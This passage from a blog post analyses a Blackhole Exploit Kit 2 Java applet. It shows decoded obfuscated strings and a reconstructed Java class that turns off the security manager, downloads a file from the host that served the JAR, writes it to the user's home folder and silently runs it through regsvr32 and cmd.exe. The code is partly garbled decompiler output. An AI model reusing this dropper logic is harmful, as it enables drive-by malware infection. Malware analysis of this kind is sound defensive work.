encstr = ["-oc\022{4kv\006'.zl]\024$mp\000&\004a{\007'(by\026'",
          "-oc\022{4kv\006'.zl]\0055gc\0329\"ip\027\020?mp\003!.a{263gz\035",
          "#aE\001<1gy\0262\"j",
          "ijy\037",
          "2}p\001{/ax\026",
          "hM",
          "ikm\026",
          "$cq]0?k",
          "j}",
          "izx\003",
          "\004a{\0070)z87<4~z\000<3gz\035",
          "5kr\000#5='"]

def main():
  for i in range(0, len(encstr), 1):
    print decode(encstr[i])

if __name__ == "__main__":
    main()

So lets run the script and voila:

java.security.AccessController
java.security.PrivilegedExceptionAction
doPrivileged
.dll
user.home
/C
.exe
cmd.exe
-s
.tmp
Content-Disposition
regsvr32

7. Back to the Applet code hw.class:

Line 47:

String str12 = d.get(this);
str12 = (new StringBuilder(String.valueOf(Asd.aaz().replaceAll((new StringBuilder(String.valueOf(codehex.aa))).append("ar").toString(), (new StringBuilder(String.valueOf(Asd.zxc2))).append(Asd.zxc).toString())))).append("?").toString();
        }
        return str12;
    }
codehex strings:
public static String aa = "(?i).j";
Asd strings:
public static String zxc = "xe";
public static String zxc2 = ".e";
Asd.aaz():
public static String aaz()
        throws Exception
    {
        Class cc = hw;
        String classFilename = "hw.class";
        String urlToJar = cc.getResource(classFilename).toString();
        Method m = java/lang/String.getMethod("replaceAll", new Class[] {
            java/lang/String, java/lang/String
        });
        urlToJar = (String)m.invoke(urlToJar, new Object[] {
            "jar:", ""
        });
        urlToJar = urlToJar.replaceAll("!/hw.class", "");
        return urlToJar;
    }


This method, to me, looks like it is finding the URL or place that the hw.class/ jar was loaded. Replaceing hw.class with nothing nad jar with exe. In short we get the URL to the exe file, which is fed into the class we discussed above.

With the deobfuscation of the class files and decrypted strings we can see what the final class does:

import java.io.*;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLConnection;
import java.security.PrivilegedExceptionAction;
import java.util.Random;

public class javaRun
    implements PrivilegedExceptionAction
{

    public javaRun(String s)
    {
        a = s;
        try
        {
            Class.forName(java.security.AccessController).getMethod(doPrivileged, new Class[] {
                Class.forName(java.security.PrivilegedExceptionAction)
            }).invoke(Class.forName(java.security.AccessController), new Object[] {
                this
            });
        }
        catch(Exception exception) { }
    }

    public Object run()
        throws Exception
    {
        boolean flag = c;
        int i;
        String s;
        String s1;
        InputStream inputstream;
        int j;
        String s3;
        System.setSecurityManager(null);
        Random random = new Random();
        i = 0xf4240 + random.nextInt(0x7a1200);
        s = (new StringBuilder()).append(i).append(".exe").toString();
        s1 = (new StringBuilder()).append(System.getProperty("user.home")).append("/").toString();
        String s2 = (new StringBuilder()).append(a.toString()).append(i).toString();
        URL url = new URL(s2);
        URLConnection urlconnection = url.openConnection();
        inputstream = urlconnection.getInputStream();
        j = 0;
        s3 = urlconnection.getHeaderField("Content-Disposition");
                s = (new StringBuilder()).append(i).append(".dll").toString();
        fileoutputstream = new FileOutputStream((new StringBuilder()).append(s1).append(s).toString());
        abyte0 = new byte[1024];
        l = i;
        int k;
        int i1;
        if((k = inputstream.read(abyte0, 0, abyte0.length)) == -1)   
        i1 = 0;
        l = l + 170 & 0xff;
        l ^= 0x48;
        abyte0[i1] ^= (byte)l;
        i1++;
        fileoutputstream.write(abyte0, 0, k);
        inputstream.close();
        fileoutputstream.close();
        Runtime runtime = Runtime.getRuntime();
        runtime.exec(new String[] {
            "cmd.exe", "/C", "regsvr32", "-s", (new StringBuilder()).append(s1).append(s).toString()
        });
        runtime.exec(new String[] {
            "cmd.exe", "/C", (new StringBuilder()).append(s1).append(s).toString()
        });
        return null;
    }

8. The End

My conclusion is that the exe is loaded from the same URL base as the JAR archive was loaded from. Its written to disk under user.home. It registrers a service silently(cmd.exe /C regsrv32 -S) and executes the exe file(cmd.exe /C )

I'm not sure if the XOR of the one byte of abyte0 is used in the code. Hopefully I can confirm that the next time I download a BHEK2 JAR archive. 


Feedback are welcome! So please enlighten me on any misinterpretation. You are of course welcome to use any Python code should it interset you.



Happy BHEK2 JAR archives deobfuscation :)

No comments:

Post a Comment